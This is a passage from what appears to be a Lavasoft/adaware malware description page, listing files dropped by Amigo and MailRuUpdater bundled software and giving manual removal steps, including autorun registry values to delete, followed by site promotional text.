    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\bg.pak (1705 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\VisualElements\smalllogo.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\amigo_cr.exe (1615 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\amigo.exe (3765 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\am.pak (1639 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\he.pak (296 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\libexif.dll (310 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\metro_driver.dll (1763 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\zh-TW.pak (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\PepperFlash\pepflashplayer.dll (122658 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\lv.pak (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\VisualElementsManifest.xml (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mg.exe (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\zh-CN.pak (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\d3dcompiler_47.dll (22433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\th.pak (1789 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\pt-BR.pak (249 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\wow_helper.exe (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\fr.pak (276 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\el.pak (1747 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\kn.pak (3669 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\vi.pak (287 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mailruupdater.exe (38588 bytes)
    %Documents and Settings%\%current user%\Desktop\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\en-US.pak (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\VisualElements\splash-620x300.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_watcher.dll (1636 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ms.pak (234 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\da.pak (234 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\mg.exe (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\PepperFlash\manifest.json (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Интернет.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ca.pak (259 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\en-GB.pak (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\mr.pak (1801 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\uk.pak (1689 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\hi.pak (1810 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_100_percent.pak (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\de.pak (256 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sr.pak (1670 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sk.pak (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\secondarytile.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\nacl_irt_x86_64.nexe (22433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\nb.pak (233 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome.dll (237340 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\AmigoDistrib[1].exe (4395514 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Opera_NI_stable[1].exe (87426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\26.tmp.exe (1597932 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (5366 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Bundle[1].exe (28602 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6.tmp.exe (29159 bytes)
    %System%\GroupPolicy\User\Registry.pol (8 bytes)
    %System%\GroupPolicy\gpt.ini (72 bytes)
    %System%\GroupPolicy\Machine\Registry.pol (8 bytes)
    %Program Files%\Mail.Ru\MailRuUpdater\MailRuUpdater.exe (39945 bytes)
    %Documents and Settings%\%current user%\Application Data\MailProducts\Id (38 bytes)
    %Documents and Settings%\All Users\Application Data\Mail.Ru\Id (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe (39945 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "amigo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --no-startup-window"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MailRuUpdater" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2024 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now